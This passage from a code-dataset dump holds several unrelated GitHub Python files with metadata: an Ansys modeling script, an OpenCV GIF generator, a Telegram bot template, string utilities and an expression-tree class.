shutil.rmtree, exp.eval_dir, ignore_errors=True)\n project.add_scp_step(exp, SCP_LOGIN, REMOTE_REPOS_DIR)\n\nproject.add_absolute_report(\n exp, attributes=ATTRIBUTES, filter=[project.add_evaluations_per_time]\n)\n\nattributes = [\"expansions\"]\npairs = [\n (\"01-cg\", \"02-ff\"),\n]\nsuffix = \"-rel\" if project.RELATIVE else \"\"\nfor algo1, algo2 in pairs:\n for attr in attributes:\n exp.add_report(\n project.ScatterPlotReport(\n relative=project.RELATIVE,\n get_category=None if project.TEX else lambda run1, run2: run1[\"domain\"],\n attributes=[attr],\n filter_algorithm=[algo1, algo2],\n filter=[project.add_evaluations_per_time],\n format=\"tex\" if project.TEX else \"png\",\n ),\n name=f\"{exp.name}-{algo1}-vs-{algo2}-{attr}{suffix}\",\n )\n\nexp.run_steps()\n","repo_name":"aibasel/lab","sub_path":"examples/downward/2020-09-11-A-cg-vs-ff.py","file_name":"2020-09-11-A-cg-vs-ff.py","file_ext":"py","file_size_in_byte":2963,"program_lang":"python","lang":"en","doc_type":"code","stars":26,"dataset":"github-code","pt":"53"} +{"seq_id":"74502657447","text":"import ScriptEnv\r\nScriptEnv.Initialize(\"Ansoft.ElectronicsDesktop\")\r\noDesktop.RestoreWindow()\r\noProject = oDesktop.GetActiveProject()\r\noDesign = oProject.GetActiveDesign()\r\noEditor = oDesign.SetActiveEditor(\"3D Modeler\")\r\nunit=oEditor.GetModelUnits()\r\n\r\ndef func(edge):\r\n p0, p1=edge\r\n x0, y0, z0=map(float,p0)\r\n x1, y1, z1=map(float,p1)\r\n p=((x0+x1)/2, (y0+y1)/2, (z0+z1)/2)\r\n v=((x1-x0),(y1-y0),(z1-z0))\r\n return (p,v)\r\n\r\ndef getAll():\r\n objs=[]\r\n totalobjects = oEditor.GetNumObjects()\r\n for i in range(totalobjects):\r\n objs.append(oEditor.GetObjectName(i))\r\n return objs\r\n\r\nedges=oEditor.GetSelections()\r\nAddWarningMessage(str(edges))\r\nedge_vertex=[oEditor.GetVertexIDsFromEdge(float(i[4:])) for i in edges] \r\nvertex_location=[(oEditor.GetVertexPosition(i),oEditor.GetVertexPosition(j)) for i,j in edge_vertex]\r\n\r\nfor p, v in map(func, vertex_location):\r\n old_name=oDesign.GetName()\r\n oProject.CopyDesign(old_name)\r\n oProject.Paste()\r\n oDesign=oProject.GetActiveDesign()\r\n new_name=oDesign.GetName()\r\n\r\n oDesign=oProject.SetActiveDesign(old_name)\r\n oEditor = oDesign.SetActiveEditor(\"3D Modeler\")\r\n oEditor.SetWCS(\r\n [\r\n \"NAME:SetWCS Parameter\",\r\n \"Working Coordinate System:=\", \"Global\",\r\n \"RegionDepCSOk:=\"\t, False\r\n ])\r\n oEditor.CreateRelativeCS(\r\n [\r\n \"NAME:RelativeCSParameters\",\r\n \"Mode:=\"\t\t, \"Axis/Position\",\r\n \"OriginX:=\"\t\t, \"{}{}\".format(p[0],unit),\r\n \"OriginY:=\"\t\t, \"{}{}\".format(p[1],unit),\r\n \"OriginZ:=\"\t\t, \"{}{}\".format(p[2],unit),\r\n \"XAxisXvec:=\"\t\t, \"{}{}\".format(v[0],unit),\r\n \"XAxisYvec:=\"\t\t, \"{}{}\".format(v[1],unit),\r\n \"XAxisZvec:=\"\t\t, \"{}{}\".format(v[2],unit),\r\n \"YAxisXvec:=\"\t\t, \"0mm\",\r\n \"YAxisYvec:=\"\t\t, \"0mm\",\r\n \"YAxisZvec:=\"\t\t, \"1mm\"\r\n ], \r\n [\r\n \"NAME:Attributes\",\r\n \"Name:=\"\t\t, \"cutCS\"\r\n ])\r\n\r\n oEditor.Split(\r\n [\r\n \"NAME:Selections\",\r\n \"Selections:=\"\t\t,','.join(getAll()),\r\n \"NewPartsModelFlag:=\"\t, \"Model\"\r\n ], \r\n [\r\n \"NAME:SplitToParameters\",\r\n \"SplitPlane:=\"\t\t, \"YZ\",\r\n \"WhichSide:=\"\t\t, \"NegativeOnly\",\r\n \"ToolType:=\"\t\t, \"PlaneTool\",\r\n \"ToolEntityID:=\"\t, -1,\r\n \"SplitCrossingObjectsOnly:=\", False,\r\n \"DeleteInvalidObjects:=\", True\r\n ])\r\n #-------------------\r\n\r\n\r\n oDesign=oProject.SetActiveDesign(new_name)\r\n oEditor = oDesign.SetActiveEditor(\"3D Modeler\") \r\n 
oEditor.SetWCS(\r\n [\r\n \"NAME:SetWCS Parameter\",\r\n \"Working Coordinate System:=\", \"Global\",\r\n \"RegionDepCSOk:=\"\t, False\r\n ])\r\n oEditor.CreateRelativeCS(\r\n [\r\n \"NAME:RelativeCSParameters\",\r\n \"Mode:=\"\t\t, \"Axis/Position\",\r\n \"OriginX:=\"\t\t, \"{}{}\".format(p[0],unit),\r\n \"OriginY:=\"\t\t, \"{}{}\".format(p[1],unit),\r\n \"OriginZ:=\"\t\t, \"{}{}\".format(p[2],unit),\r\n \"XAxisXvec:=\"\t\t, \"{}{}\".format(v[0],unit),\r\n \"XAxisYvec:=\"\t\t, \"{}{}\".format(v[1],unit),\r\n \"XAxisZvec:=\"\t\t, \"{}{}\".format(v[2],unit),\r\n \"YAxisXvec:=\"\t\t, \"0mm\",\r\n \"YAxisYvec:=\"\t\t, \"0mm\",\r\n \"YAxisZvec:=\"\t\t, \"1mm\"\r\n ], \r\n [\r\n \"NAME:Attributes\",\r\n \"Name:=\"\t\t, \"cutCS\"\r\n ])\r\n\r\n oEditor.Split(\r\n [\r\n \"NAME:Selections\",\r\n \"Selections:=\"\t\t,','.join(getAll()),\r\n \"NewPartsModelFlag:=\"\t, \"Model\"\r\n ], \r\n [\r\n \"NAME:SplitToParameters\",\r\n \"SplitPlane:=\"\t\t, \"YZ\",\r\n \"WhichSide:=\"\t\t, \"PositiveOnly\",\r\n \"ToolType:=\"\t\t, \"PlaneTool\",\r\n \"ToolEntityID:=\"\t, -1,\r\n \"SplitCrossingObjectsOnly:=\", False,\r\n \"DeleteInvalidObjects:=\", True\r\n ]) \r\n #---------------------------------\r\n","repo_name":"linmingchih/HowtoSim_Script","sub_path":"cutLine.py","file_name":"cutLine.py","file_ext":"py","file_size_in_byte":4003,"program_lang":"python","lang":"en","doc_type":"code","stars":122,"dataset":"github-code","pt":"53"} +{"seq_id":"33863572001","text":"import argparse\nimport cv2\nimport numpy as np\nimport time\nfrom PIL import Image, ImageDraw\n\nFPS = 30\nangular_velocity = np.degrees(np.pi) # I'll make 1 rotation per 2 seconds\nstep_angle = angular_velocity / FPS\nstep_radian = np.radians(step_angle)\nmax_count = 3\n\ngif_frames = []\n\ndef save_gif(frames, gifname, speed): #speed 100\n frames[0].save(gifname, format='GIF', append_images=frames[1:], save_all=True, duration=speed, loop=0)\n\ndef process_masking(base, mask, pos):\n h, w, c = mask.shape\n x = pos[0]\n y = pos[1]\n if c == 4:\n mask = cv2.cvtColor(mask, cv2.COLOR_BGRA2BGR) \n img = base.copy()\n bg = img[y:y+h, x:x+w] #overlay area\n try:\n for i in range(0, h):\n for j in range(0, w):\n B = mask[i][j][0]\n G = mask[i][j][1]\n R = mask[i][j][2]\n if (int(B) + int(G) + int(R)):\n bg[i][j][0] = B\n bg[i][j][1] = G\n bg[i][j][2] = R\n img[y:y+h, x:x+w] = bg\n except IndexError:\n print(' index Error')\n return None\n return img\n\ndef delay_fps(s):\n while (time.time() - s < (1.0 / FPS) ):\n time.sleep(0.001)\n\nparser = argparse.ArgumentParser(description=\"OpenCV Example\")\nparser.add_argument(\"--file\", type=str, required=True, help=\"filename of the input image to process\")\nargs = parser.parse_args()\n\n\nmask = cv2.imread(args.file, cv2.IMREAD_COLOR)\nheight, width, channels = mask.shape\nprint(\"image H:%d W:%d, Channel:%d\"%(height, width, channels))\nprint('Angular Velocity:%f step_angle:%f'%(angular_velocity, step_angle))\ncanvas = np.zeros((height * 2, width * 5, 3), np.uint8)\nc_height, c_width, c_channels = canvas.shape\n\nangle = step_angle\nx_pos = c_width - width\ncount = 0\n\nwhile count < max_count:\n matrix = cv2.getRotationMatrix2D((width/2, height/2), angle, 1)\n rotate = cv2.warpAffine(mask, matrix, (width, height))\n s = time.time()\n angle += step_angle\n if(angle > 360):\n angle = 0\n\n print('x_pos:%d'%(x_pos))\n img = process_masking(canvas, rotate, (x_pos,0))\n x_pos -= int(step_radian * height / 2 )\n if c_channels == 4:\n rgb = cv2.cvtColor(img, cv2.COLOR_BGRA2RGB) \n else: \n rgb = 
cv2.cvtColor(img, cv2.COLOR_BGR2RGB) \n im_pil = Image.fromarray(rgb)\n gif_frames.append(im_pil)\n cv2.imshow('rotate', img)\n if(x_pos < count * width):\n x_pos = c_width - width\n count += 1\n canvas = img.copy()\n k = cv2.waitKey(1)\n delay_fps(s)\n \nsave_gif(gif_frames, \"f:\\\\tmp\\\\bear.gif\", 50)\ncv2.waitKey(0)\ncv2.destroyAllWindows()","repo_name":"raspberry-pi-maker/OpenCV","sub_path":"gif_create.py","file_name":"gif_create.py","file_ext":"py","file_size_in_byte":2624,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"4941189759","text":"from telebot import TeleBot\n\nimport config\nimport commands\nimport handlers\nfrom call_types import CallTypes\n\nfrom backend.models import BotUser\n\n\nmessage_handlers = {\n '/start': commands.start_command_handler,\n}\n\nkey_handlers = {\n\n}\n\nstate_handlers = {\n\n}\n\nbot = TeleBot(\n token=config.TOKEN,\n num_threads=3,\n parse_mode='HTML',\n)\n\n\ndef create_user(message) -> BotUser:\n return BotUser.objects.create(\n chat_id=message.chat.id,\n first_name=message.chat.first_name,\n last_name=message.chat.last_name,\n username=message.chat.username,\n )\n\n\n@bot.message_handler()\ndef message_handler(message):\n chat_id = message.chat.id\n if not BotUser.objects.filter(chat_id=chat_id).exists():\n create_user(message)\n\n user = BotUser.objects.get(chat_id=chat_id)\n if user.bot_state:\n state_handlers[user.bot_state](bot, message)\n return\n\n for text, handler in message_handlers.items():\n if message.text == text:\n handler(bot, message)\n break\n\n for key, handler in key_handlers.items():\n if message.text in key.getall():\n handler(bot, message)\n break\n\n\ncallback_query_handlers = {\n CallTypes.Language: handlers.language_callback_query_handler,\n}\n\n\n@bot.callback_query_handler(func=lambda call: True)\ndef callback_query_handler(call):\n call_type = CallTypes.parse_data(call.data)\n for CallType, handler in callback_query_handlers.items():\n if CallType == call_type.__class__:\n handler(bot, call)\n break\n\n\nif __name__ == \"__main__\":\n # bot.polling()\n bot.infinity_polling()\n","repo_name":"archon1999/TelegramBotTemplate","sub_path":"client/bot.py","file_name":"bot.py","file_ext":"py","file_size_in_byte":1639,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"73717628647","text":"# ------------------------------------------------------------------------------\nimport re, unicodedata\n\n# ------------------------------------------------------------------------------\ncharsIgnore = '.,:;*+=~?%^\\'’\"<>{}[]|\\t\\\\°-'\nfileNameIgnore = charsIgnore + ' $£€/\\r\\n'\nextractIgnore = charsIgnore + '/()'\nalphaRex = re.compile(b'[a-zA-Z]')\nalphanumRex = re.compile(b'[a-zA-Z0-9]')\nalphanum_Rex = re.compile(b'[a-zA-Z0-9_]')\n\ndef normalizeString(s, usage='fileName'):\n '''Returns a version of string p_s whose special chars (like accents) have\n been replaced with normal chars. Moreover, if p_usage is:\n * fileName: it removes any char that can't be part of a file name;\n * alphanum: it removes any non-alphanumeric char;\n * alpha: it removes any non-letter char.\n '''\n strNeeded = isinstance(s, str)\n # We work in unicode. 
Convert p_s to unicode if not unicode.\n if isinstance(s, str):\n try:\n s = s.decode('utf-8')\n except UnicodeDecodeError:\n # Another encoding may be in use\n s = s.decode('latin-1')\n elif not isinstance(s, unicode): s = unicode(s)\n # For extracted text, replace any unwanted char with a blank\n if usage == 'extractedText':\n res = u''\n for char in s:\n if char not in extractIgnore: res += char\n else: res += ' '\n s = res\n # Standardize special chars like accents\n s = unicodedata.normalize('NFKD', s).encode('ascii', 'ignore')\n # Remove any other char, depending on p_usage\n if usage == 'fileName':\n # Remove any char that can't be found within a file name under Windows\n # or that could lead to problems with LibreOffice.\n res = ''\n for char in s:\n if char not in fileNameIgnore: res += char\n elif usage.startswith('alpha'):\n exec('rex = %sRex' % usage)\n res = ''\n for char in s:\n if rex.match(char): res += char\n elif usage == 'noAccents':\n res = s\n else:\n res = s\n # Re-code the result as a str if a str was given\n if strNeeded: res = res.encode('utf-8')\n return res\n\ndef normalizeText(s, lower=True):\n '''Remove from p_s special chars and lowerize it (if p_lower is True) for\n indexing or other purposes.'''\n r = normalizeString(s, usage='extractedText').strip()\n if lower: r = r.lower()\n return r\n\ndef keepDigits(s):\n '''Returns string p_s whose non-number chars have been removed'''\n if s is None: return s\n res = ''\n for c in s:\n if c.isdigit(): res += c\n return res\n\ndef keepAlphanum(s):\n '''Returns string p_s whose non-alphanum chars have been removed'''\n if s is None: return s\n res = ''\n for c in s:\n if c.isalnum(): res += c\n return res\n\ndef getStringFrom(o):\n '''Returns a string representation for p_o that can be transported over\n HTTP and manipulated in Javascript.'''\n if isinstance(o, dict):\n res = []\n for k, v in o.items():\n res.append(\"%s:%s\" % (getStringFrom(k), getStringFrom(v)))\n return '{%s}' % ','.join(res)\n elif isinstance(o, list) or isinstance(o, tuple):\n return '[%s]' % ','.join([getStringFrom(v) for v in o])\n else:\n if not isinstance(o, basestring): o = str(o)\n return \"'%s'\" % (o.replace(\"'\", \"\\\\'\"))\n\ndef getDictFrom(s):\n '''Returns a dict from string representation p_s of the form\n \"key1:value1,key2:value2\".'''\n res = {}\n if s:\n for part in s.split(','):\n key, value = part.split(':')\n res[key] = value\n return res\n\ndef sadd(s, sub, sep=' '):\n '''Adds sub-string p_sub into p_s, which is a list of sub-strings separated\n by p_sep, and returns the updated string.'''\n if not sub: return s\n if not s: return sub\n elems = set(s.split(sep)).union(set(sub.split(sep)))\n return sep.join(elems)\n\ndef sremove(s, sub, sep=' '):\n '''Removes sub-string p_sub from p_s, which is a list of sub-strings\n separated by p_sep, and returns the updated string.'''\n if not sub: return s\n if not s: return s\n elems = set(s.split(sep))\n for elem in sub.split(sep):\n if elem in elems:\n elems.remove(elem)\n return sep.join(elems)\n\ndef stretchText(s, pattern, char=' '):\n '''Inserts occurrences of p_char within p_s according to p_pattern.\n Example: stretchText(\"475123456\", (3,2,2,2)) returns '475 12 34 56'.'''\n res = ''\n i = 0\n for nb in pattern:\n j = 0\n while j < nb:\n res += s[i+j]\n j += 1\n res += char\n i += nb\n return res\n\n# ------------------------------------------------------------------------------\nclass PasswordGenerator:\n '''Class used to generate passwords'''\n # No \"0\" or \"1\" that could 
be interpreted as letters \"O\" or \"l\"\n passwordDigits = '23456789'\n # No letters i, l, o (nor lowercase nor uppercase) that could be misread\n passwordLetters = 'abcdefghjkmnpqrstuvwxyzABCDEFGHJKMNPQRSTUVWXYZ'\n\n @classmethod\n def get(k, minLength=5, maxLength=9):\n '''Generates and r_eturns a password whose length is between p_minLength\n and p_maxLength.'''\n # Compute the actual length of the challenge to encode\n length = random.randint(minLength, maxLength)\n r = ''\n for i in range(length):\n j = random.randint(0, 1)\n chars = (j == 0) and k.passwordDigits or k.passwordLetters\n # Choose a char\n r += chars[random.randint(0,len(chars)-1)]\n return r\n\n# ------------------------------------------------------------------------------\ndef lower(s):\n '''French-accents-aware variant of string.lower.'''\n isUnicode = isinstance(s, unicode)\n if not isUnicode: s = s.decode('utf-8')\n res = s.lower()\n if not isUnicode: res = res.encode('utf-8')\n return res\n\ndef upper(s):\n '''French-accents-aware variant of string.upper.'''\n isUnicode = isinstance(s, unicode)\n if not isUnicode: s = s.decode('utf-8')\n res = s.upper()\n if not isUnicode: res = res.encode('utf-8')\n return res\n\n# ------------------------------------------------------------------------------\nclass WhitespaceCruncher:\n '''Takes care of removing unnecessary whitespace in several contexts'''\n whitechars = u' \\r\\t\\n' # Chars considered as whitespace\n allWhitechars = whitechars + u' ' # nbsp\n @staticmethod\n def crunch(s, previous=None):\n '''Return a version of p_s (expected to be a unicode string) where all\n \"whitechars\" are:\n * converted to real whitespace;\n * reduced in such a way that there cannot be 2 consecutive\n whitespace chars.\n If p_previous is given, those rules must also apply globally to\n previous+s.'''\n res = ''\n # Initialise the previous char\n if previous:\n previousChar = previous[-1]\n else:\n previousChar = u''\n for char in s:\n if char in WhitespaceCruncher.whitechars:\n # Include the current whitechar in the result if the previous\n # char is not a whitespace or nbsp.\n if not previousChar or \\\n (previousChar not in WhitespaceCruncher.allWhitechars):\n res += u' '\n else: res += char\n previousChar = char\n # \"res\" can be a single whitespace. 
It is up to the caller method to\n # identify when this single whitespace must be kept or crunched.\n return res\n# ------------------------------------------------------------------------------\n","repo_name":"lino-framework/appypod","sub_path":"appy/utils/string.py","file_name":"string.py","file_ext":"py","file_size_in_byte":7664,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"34969382620","text":"import pandas as pd\nimport re\nimport sys\nimport pytz\nfrom icalendar import vDatetime\nfrom icalendar import Calendar, Event\nfrom datetime import datetime\n\norig_csv = pd.read_csv('../static/csv/ISMIR_all_events - All_Events_Details.csv')\norig_csv = orig_csv.sort_values(by=['Event number (UTC)'])\n\nprint(orig_csv['Category'].unique())\n\nopening_ref_a = 11 #openingA\nopening_ref_b = 20 #openingB\n\ncolor_dict = {\n \"Tutorials\": \"tut\",\n \"All Meeting\": \"all\", # big stuff such as keynotes, business meetings\n \"Poster session\": \"pos\",\n \"Meetup\": \"meet\",\n \"WiMIR Meetup\": \"wimir\",\n \"Meetup-Special\": \"meet-spec\",\n \"Music concert\": \"mus\",\n \"Masterclass\": \"master\",\n \"Satellite\": \"sat\",\n}\n\n# same events different times, via event number field\n\ntutorials_list = [\n [1, 6], # tutorials\n [2, 7],\n [3, 9],\n [4, 8],\n [5, 10],\n [11, 20], # opening\n [68, 77], # business meeting\n]\n\nposters_dict = {\n \"1A\": 1,\n \"2A\": 2,\n \"3A\": 3,\n \"4A\": 4,\n \"5A\": 5,\n \"6A\": 6,\n \"7A\": 7,\n \"8A\": 8,\n \"1B\": 1,\n \"2B\": 2,\n \"3B\": 3,\n \"4B\": 4,\n \"5B\": 5,\n \"6B\": 6,\n \"7B\": 7,\n \"8B\": 8\n}\n\n# print(orig_csv['Event number (UTC)'])\ncal = Calendar()\ncal.add('prodid', 'ISMIR 2020 calendar')\ncal.add('version', '2.0')\ncal['dtstart'] = '20201011T000000'\nevents_meta = {}\n# cal['dtstart'] = '20050404T080000'\n# cal['summary'] = 'Python meeting about calendaring'\n\ndef display(cal):\n return cal.to_ical().replace('\\r\\n', '\\n').strip()\n\n# make tutorials.csv\n\ntut_csv = orig_csv.copy()[orig_csv['Category'].isin([\"Tutorials\", \"All Meeting\"])]\ntut_csv['start_date_b'] = [\"\"] * tut_csv.shape[0]\ntut_csv['start_time_b'] = [\"\"] * tut_csv.shape[0]\n\nfor p in tutorials_list:\n tut_csv.loc[tut_csv['Event number (UTC)'] == p[0], 'start_date_b'] = tut_csv.loc[tut_csv['Event number (UTC)'] == p[1], 'Date (UTC)'].values[0]\n tut_csv.loc[tut_csv['Event number (UTC)'] == p[0], 'start_time_b'] = tut_csv.loc[tut_csv['Event number (UTC)'] == p[1], 'Start time (UTC)'].values[0]\n# print(tut_csv)\n# for p in tutorials_list:\ntut_csv = tut_csv[tut_csv['start_date_b'] != \"\"]\ntut_csv = tut_csv.sort_values(by=['Title'])\n\n# summary is event title\n# location is the link on the calendar\n\nfor index, event in orig_csv.iterrows():\n e_cal = Event()\n e_meta = {}\n\n e_date = [int(x) for x in event['Date (UTC)'].split('-')]\n e_start_time = [int(x) for x in event['Start time (UTC)'].split(':')]\n e_end_time = [int(x) for x in event['End time'].split(':')]\n e_cal.add('uid', int(event['Event number (UTC)']) + 10)\n e_cal.add('dtstamp', datetime(2020,10,1,0,0,0,tzinfo=pytz.utc))\n if event['Event number (UTC)'] == opening_ref_a:\n e_cal['description'] = 'openingA'\n elif event['Event number (UTC)'] == opening_ref_b:\n e_cal['description'] = 'openingB'\n\n if event['Category'] == \"Poster session\":\n session_num = posters_dict[event['Title'].split(\" \")[-1]]\n if any(e in event[\"Title\"] for e in ['LBD']):\n e_cal['location'] = f'lbds.html?session={session_num}'\n elif any(e in 
event[\"Title\"] for e in ['Ind']):\n e_cal['location'] = f'industry.html?session={session_num}'\n else:\n e_cal['location'] = f'papers.html?session={session_num}'\n\n\n elif event['Category'] == \"Tutorials\":\n e_cal['location'] = f'tutorials.html#{event[\"Title\"][:2]}'\n\n elif event['Category'] == \"Music concert\":\n session_num = posters_dict[event['Title'].split(\" \")[-1]]\n e_cal['location'] = f'music.html?session={session_num}'\n elif event['Category'] == \"Meetup\":\n e_cal['location'] = event['Channel URL']\n\n elif event['Category'] in [\"All Meeting\", \"Meetup-Special\", \"WiMIR Meetup\", \"Masterclass\"]:\n if any(e in event[\"Title\"] for e in ['Opening', \"Business\"]):\n e_cal['location'] = f'day_{event[\"Conf day\"]}.html#{color_dict[event[\"Category\"]] + \"_b\"}'\n else:\n e_cal['location'] = f'day_{event[\"Conf day\"]}.html#{color_dict[event[\"Category\"]]}'\n\n elif event['Category'] == \"Satellite\":\n e_cal['location'] = event['Website link']\n # elif event['Category'] in [\"All Meeting\", \"Meetup\"]:\n # e_cal['location'] = event['Channel URL']\n\n\n e_cal.add('summary', \"#\" + color_dict[event['Category']] + ' ' + event['Title'])\n e_cal.add('dtstart', datetime(e_date[0], e_date[1], e_date[2],\n e_start_time[0], e_start_time[1], 0, tzinfo=pytz.utc))\n if e_end_time[0] < e_start_time[0]:\n e_cal.add('dtend', datetime(e_date[0], e_date[1], e_date[2] + 1,\n e_end_time[0], e_end_time[1], 0, tzinfo=pytz.utc))\n else:\n e_cal.add('dtend', datetime(e_date[0], e_date[1], e_date[2],\n e_end_time[0], e_end_time[1], 0, tzinfo=pytz.utc))\n\n cal.add_component(e_cal)\n\nnew_csv = pd.DataFrame(\n {\"UID\": orig_csv['Event number (UTC)'],\n \"title\": orig_csv['Title'],\n \"day\": orig_csv['Conf day'],\n \"start_date\": orig_csv['Date (UTC)'],\n \"start_time\": orig_csv['Start time (UTC)'],\n \"category\": orig_csv['Category'],\n \"description\": orig_csv['Description'],\n \"organiser\": orig_csv['Organiser'],\n \"web_link\": orig_csv['Website link'],\n \"slack_channel\": orig_csv['Slack Channel'],\n \"channel_url\": orig_csv['Channel URL'],\n})\n\nnew_tut_csv = pd.DataFrame({\n \"UID\": tut_csv['Event number (UTC)'],\n \"title\": [s.split(':')[0][:-1] + ': ' + s.split(':')[1] if ':' in s else s for s in tut_csv['Title']],\n \"day\": tut_csv['Conf day'],\n \"start_date\": tut_csv['Date (UTC)'],\n \"start_time\": tut_csv['Start time (UTC)'],\n \"start_date_b\": tut_csv['start_date_b'],\n \"start_time_b\": tut_csv['start_time_b'],\n \"category\": tut_csv['Category'],\n \"description\": tut_csv['Description'],\n \"organiser\": tut_csv['Organiser'],\n \"web_link\": tut_csv['Website link'],\n \"slack_channel\": tut_csv['Slack Channel'],\n \"channel_url\": tut_csv['Channel URL'],\n})\n\nwith open('../static/calendar/ISMIR_2020.ics', 'wb') as f:\n f.write(cal.to_ical())\n\nnew_csv.to_csv('../sitedata/events.csv', index=False)\nnew_tut_csv.to_csv('../sitedata/tutorials_all.csv', index=False)\n# print(cal)\n# print(events_meta)\n","repo_name":"DDMAL/ISMIR-Conf","sub_path":"scripts/convert_all_events.py","file_name":"convert_all_events.py","file_ext":"py","file_size_in_byte":6153,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"25493599337","text":"from .request import get_galleries, url_galleries\nfrom .gallery import Gallery\nfrom .helpers import api_key, join_params, set_limit, sort_format_galleries\n\n__all__ = [\n \"Galleries\"\n]\n\nclass Galleries(object):\n \"\"\"\n All properties are read-only, and every method 
returns a new instance of\n Galleries() to avoid mutating state in ongoing search queries. This makes object\n interactions predictable as well as making versioning of searches relatively\n easy.\n \"\"\"\n def __init__(self, title=\"\", description=\"\", include_image=None,\n sf=\"created_at\", sd=\"desc\", user=\"\",\n key=\"\", limit=50, perpage=25, page=1,\n url_domain=\"https://twibooru.org\", proxies={}):\n \"\"\"\n By default initializes an instance of Galleries with the parameters to get\n the first 25 galleries on Twibooru's galleries page.\n \"\"\"\n self.proxies = proxies\n self.url_domain = url_domain\n self._params = {\n \"key\": api_key(key),\n \"title\": title,\n \"description\": description,\n \"include_image\": set_limit(include_image),\n \"sf\": sort_format_galleries(sf),\n \"sd\": sd,\n \"perpage\": set_limit(perpage),\n \"page\": set_limit(page),\n \"user\": user,\n }\n self._limit = set_limit(limit)\n self._search = get_galleries(self._params, self._limit,\n url_domain=self.url_domain, proxies=self.proxies)\n \n def __iter__(self):\n \"\"\"\n Make Galleries() iterable so that new search results can be lazily generated\n for performance reasons.\n \"\"\"\n return self\n\n @property\n def parameters(self):\n \"\"\"\n Returns a list of available parameters; useful for passing state to new\n instances of Galleries().\n \"\"\"\n return self._params\n\n @property\n def url(self):\n \"\"\"\n Returns a search URL built on set parameters. Example based on default\n parameters:\n\n https://twibooru.org/galleries?title=*&description=&creator=&include_image=&sf=created_at&sd=desc\n \"\"\"\n return url_galleries(self.parameters, url_domain=self.url_domain)\n\n def key(self, key=\"\"):\n \"\"\"\n Takes a user's API key string which applies content settings. API keys can\n be found at <https://twibooru.org/registration/edit>.\n \"\"\"\n params = join_params(self.parameters, {\"key\": key,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def title(self, title=\"\"):\n \"\"\"\n Takes string for searching by title.\n \"\"\"\n params = join_params(self.parameters, {\"title\": title,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def description(self, description=\"\"):\n \"\"\"\n Takes string for searching by description.\n \"\"\"\n params = join_params(self.parameters, {\"description\": description,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def include_image(self, include_image=None):\n \"\"\"\n Takes image ID for searching by include image.\n \"\"\"\n params = join_params(self.parameters, {\"include_image\": include_image,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def user(self, user=\"\"):\n \"\"\"\n Takes string for searching by user.\n \"\"\"\n params = join_params(self.parameters, {\"user\": user,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def sort_by(self, sf):\n \"\"\"\n Determines how to sort search results. 
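For example, Galleries().sort_by(sort.CREATED_AT) builds a fresh query and leaves the current search untouched. 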
Available sorting methods are\n sort.SCORE, sort.COMMENTS, sort.HEIGHT, sort.RELEVANCE, sort.CREATED_AT,\n and sort.RANDOM; default is sort.CREATED_AT.\n \"\"\"\n params = join_params(self.parameters, {\"sf\": sf,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def descending(self):\n \"\"\"\n Order results from largest to smallest; default is descending order.\n \"\"\"\n params = join_params(self.parameters, {\"sd\": \"desc\",\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def ascending(self, sd=\"asc\"):\n \"\"\"\n Order results from smallest to largest; default is descending order.\n \"\"\"\n params = join_params(self.parameters, {\"sd\": sd,\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def limit(self, limit):\n \"\"\"\n Set absolute limit on number of galleries to return, or set to None to return\n as many results as needed; default 50 galleries. This limit on app-level.\n \"\"\"\n params = join_params(self.parameters, {\"limit\": limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies})\n\n return self.__class__(**params)\n\n def get_page(self,page):\n \"\"\"\n Set page for gets result of search.\n \"\"\"\n params = join_params(self.parameters, {\"page\": set_limit(page),\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def perpage(self,limit):\n \"\"\"\n Set absolute limit on number of galleries to get, or set to None to return\n defaulting 25 galleries; max 50 galleries. This limit on API-level.\n \"\"\"\n params = join_params(self.parameters, {\"perpage\": set_limit(limit),\n \"limit\": self._limit,\n \"url_domain\": self.url_domain,\n \"proxies\": self.proxies}\n )\n\n return self.__class__(**params)\n\n def __next__(self):\n \"\"\"\n Returns a result wrapped in a new instance of Gallery().\n \"\"\"\n return Gallery(next(self._search), search_params=self.parameters,\n url_domain=self.url_domain, proxies=self.proxies)","repo_name":"Atronar/Twibooru-Py","sub_path":"twibooru/galleries.py","file_name":"galleries.py","file_ext":"py","file_size_in_byte":7381,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10564718077","text":"import LinkedBinaryTree\n\nclass ExpressionTree(LinkedBinaryTree):\n \"\"\"\n An arithmetic expression tree\n \"\"\"\n\n def __init__(self, token, left=None, right=None):\n \"\"\"\n Create an expression tree.\n\n In single parameter form, token should be a leaf value, aka a number and the expression tree will have\n that value at an isolated node\n\n In a three-parameter version, token should be an operator,\n and left and right should be existing ExpressionTree instances\n that become the operands for the binary operator\n :param token:\n :param left:\n :param right:\n \"\"\"\n\n super().__init__()\n if not isinstance(token, str):\n raise TypeError('Token must be a string')\n self._add_root(token)\n if left is not None:\n if token not in '+-*/':\n raise ValueError('token must be valid operator')\n self._attach(self.root(), left, right)\n\n def __str__(self):\n pieces = []\n 